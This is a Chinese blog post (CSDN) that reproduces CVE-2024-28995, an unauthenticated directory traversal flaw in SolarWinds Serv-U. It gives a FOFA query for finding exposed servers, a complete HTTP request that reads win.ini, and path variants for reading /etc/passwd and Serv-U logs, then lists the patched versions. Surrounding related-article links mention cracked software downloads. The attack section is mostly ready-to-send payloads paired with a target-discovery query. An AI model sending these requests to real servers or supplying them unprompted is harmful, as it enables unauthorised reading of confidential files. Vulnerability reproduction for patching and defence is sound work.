SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)

已于 2024-06-14 15:43:56 修改
阅读量862 收藏 7
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全
于 2024-06-14 15:42:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangyongkang666/article/details/139683287
版权

SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)

1.漏洞描述

SolarWinds 是一家提供广泛的 IT 管理和网络管理软件解决方案的公司。SolarWinds 的产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等。Serv-U 是 SolarWinds 提供的一款 FTP(文件传输协议)服务器软件,它允许用户在 Windows 、Linux 系统上设置和管理 FTP 服务。Serv-U 提供了多种功能,以确保文件传输的安全性、效率和灵活性。

SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。

影响版本

SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1

SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1

SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1

根据官方文档,Serv-U 版本15.3.2及更早版本将于 2025 年 2 月终止使用,并且低于此版本的所有版本都已终止使用并且不再受支持,使用了所有默认安装选项都受到此漏洞影响。

2.漏洞复现

FOFA:app=“SolarWinds-Serv-U-FTP”

GET /?InternalDir=../../../../../../../../windows&InternalFile=win.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

在这里插入图片描述

另外:当以 Linux 系统为目标读取任意文件时,如/etc/passwd路径分隔符必须是反斜杠 ( \),而不是正斜杠 ( /),但是目前公网上大部分受影响的产品均为windows系统

/?InternalDir=\..\..\..\..\etc&InternalFile=passwd
/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt

在这里插入图片描述

3.漏洞修复

目前官方已有可更新版本,建议 Serv-U 客户尽快应用此修补程序:

SolarWinds Serv-U FTP Server >= 15.4.2 Hotfix 2

SolarWinds Serv-U Gateway >= 15.4.2 Hotfix 2

SolarWinds Serv-U MFT Server >= 15.4.2 Hotfix 2

您可以从此处的供应商处获取有关此修补程序的更多信息:

https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Release-Notes

makven60
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 767
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
SolarWinds Serv-U 目录遍历漏洞(CVE-2024-28995、QVD-2024-21929)
WuYSec的博客
06-14 630
SolarWinds 是一家提供广泛的 IT 管理和网络管理软件解决方案的公司。SolarWinds 的产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等。Serv-USolarWinds 提供的一款 FTP(文件传输协议)服务器软件,它允许用户在 Windows 、Linux 系统上设置和管理 FTP 服务。Serv-U 提供了多种功能,以确保文件传输的安全性、效率和灵活性。
安全漏洞周报(2024.06.10-2024.06.17)
最新发布
Enlink_Young的博客
06-17 398
易安联专注零信任安全,先后发布EnSDP(零信任安界防护平台)、EnBox(零信任安全工作空间)、EnCASB(零信任云应用安全接入平台)、EnAppGate(统一资源发布系统)、EnIAM(零信任身份管理平台)、EnDTA(天织·DTA威胁分析系统)等多款产品及解决方案,推出ZTNA零信任网络架构解决方案和EnSASE安全访问服务边缘解决方案并提供包括安全运维、实战攻防、应急演练等安全服务。推出的威胁情报和天织DNS威胁分析平台,可以为用户提供高效的威胁防护能力,帮助用户更好地应对各类网络威胁。
CVE-2021-35211: SolarWinds Serv-U SSH 漏洞分析
HBohan的博客
09-07 2475
SolarWinds发布安全公告,修复了Serv-U中存在的远程代码执行漏洞CVE-2021-35211),该漏洞为微软发现在野利用后向SolarWinds报告,并提供了漏洞利用的概念证明。未经身份验证的远程攻击者利用此漏洞可在受影响的服务器上以特殊权限执行任意代码,请相关用户尽快采取措施进行防护。 该漏洞存在于SSH协议中,与 SUNBURST 供应链攻击无关,仅影响SolarWinds Serv-U Managed File Transfer和Serv-U Secure FTP。使用Serv-U管理控
Solarwinds_Serv-U_MFT_Server_15.1.7_Downloadly.ir.rar
10-19
最新版,无漏洞,已通过安全测试,插件版本,新,好用,非常适合网络工程师,系统搭建,我公司已用了很多年。
Serv-U v6.0 本地权限提升漏洞
weixin_33686714的博客
11-08 1378
受影响系统]:Serv-UFTPServer6.0Serv-UFTPServer5.1.0.0Serv-UFTPServer5.0.0.9Serv-UFTPServer5.0.0.4Serv-UFTPServer5.0Serv-UFTPServer4.1.0.3Serv-UFTPServer4.1.0.11Ser...
cve-1999-0614 ftp服务器版本信息可被获取,关于SolarWinds Serv-U远程代码执行漏洞CVE-2021-35211)的预警提示...
weixin_28878117的博客
08-13 1407
一、漏洞详情Serv-UWindows平台和Linux平台的安全FTP服务器(FTPS, SFTP, HTTPS),是一个文件管理、文件传输和文件共享的解决方案。2021年7月13日,SolarWinds对外发布漏洞公告,其产品Serv-U Managed File Transfer Server及Serv-U Secured FTP在启用了SSH的情况下存在CVE-2021-35211远程代码...
通过Kali利用serv-u漏洞获取win7系统管理员权限
weixin_60182338的博客
02-21 1845
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击。
serv-u-win10(15.2).rar
08-19
4. **虚拟目录和映射**:Serv-U支持虚拟目录,可以创建多个逻辑目录,即使它们在物理上位于不同的位置。此外,还可以映射网络驱动器为FTP服务器的一部分,方便管理和访问。 5. **日志记录和审计**:详细的日志功能...
Serv-U15破解版
02-11
Serv-U15破解版:已经进行过测试,永不过期!!
Serv-U FTP绿色破解版
04-10
Serv-U FTP绿色破解版,提供安装教程,非常好用,快下载吧。
Serv-U漏洞解析 防患于未然 serv_u安全设置
09-30
Serv-U是一个极为强大的FTP服务器软件,而近两年不断爆出的各个版本的安全漏洞,却让大家在使用Serv-U时不得不多留个心眼。本文对Serv-U漏洞进行详细地分析,防患于未然,安全设置以后还是可以使用的
mft:一个通过SolarWinds Serv-U托管文件传输方便共享文件的库
02-17
一个通过SolarWinds Serv-U托管文件传输方便共享文件的库。 安装 : pip install git+https://github.com/GitPushPullLegs/mft.git 快速开始: 示范代码 from mft import Client from datetime import datetime ...
SolarWinds-SERVU-FTP-Server-v15.3.0.1356-Windows
02-09
SolarWinds SERVU FTP Server v15.3.0.1356 Windows:高效安全的...通过Trail Reset.cmd和SolarWinds-SERVU-FTP-Server-v15.3.0.1356-Windows.exe这两个文件,用户可以试用并安装这款软件,体验其带来的便捷与安心。
Serv-U分布式体系架构指南.docx
08-10
Serv-U分布式体系架构指南 Serv-U是一款高性能的安全文件传输服务器,支持Windows和Linux平台,能够处理FTP、FTPS(SSL/TLS)、SFTP(SSH)、HTTP和HTTPS连接,并且提供了针对Web浏览器和移动设备(如iPad、iPhone...
CVE-2024-23897复现及IDS中snort防御规则制定
2401_82670286的博客
01-30 2515
CVE-2024-23897是一个涉及Jenkins未授权文件读取的漏洞。它利用了Jenkins命令行接口(CLI)的特性,其中CLI使用args4j库解析命令行参数。args4j库具有一个特点,即当命令行参数以@字符开头时,该参数会被视为文件路径,并将该文件内容读取作为参数。利用这一特性,攻击者可以通过Jenkins CLI读取Jenkins服务器上的任意文件。这段代码的主要问题在于它处理以字符开头的命令行参数时,会尝试将其视为文件路径,并读取该文件的内容。具体来说,如果参数以。
CVE-2022-21548怎么修复
05-19
CVE-2022-21548是指SolarWinds Orion平台中的一个漏洞,攻击者可以利用该漏洞实现远程代码执行。如果您正在使用SolarWinds Orion,请立即采取以下步骤来修复此漏洞: 1. 下载并安装SolarWinds Orion平台的最新补丁程序。该补丁程序包括修复CVE-2022-21548的安全更新。 2. 更新SolarWinds Orion平台中的所有插件和应用程序组件至最新版本。这些组件可能包含旧版本的代码,这些代码可能存在漏洞。 3. 检查SolarWinds Orion平台的配置,确保安全设置已正确配置。例如,确保访问控制列表(ACL)和防火墙策略有效,以及所有默认凭据和密码已更改。 4. 监测网络流量并查找任何异常活动。攻击者可能会在未经授权的情况下访问系统,因此查看日志文件和网络流量可以帮助您识别攻击行为。 需要注意的是,由于该漏洞的危害性很高,建议您尽快采取上述措施来保护您的系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值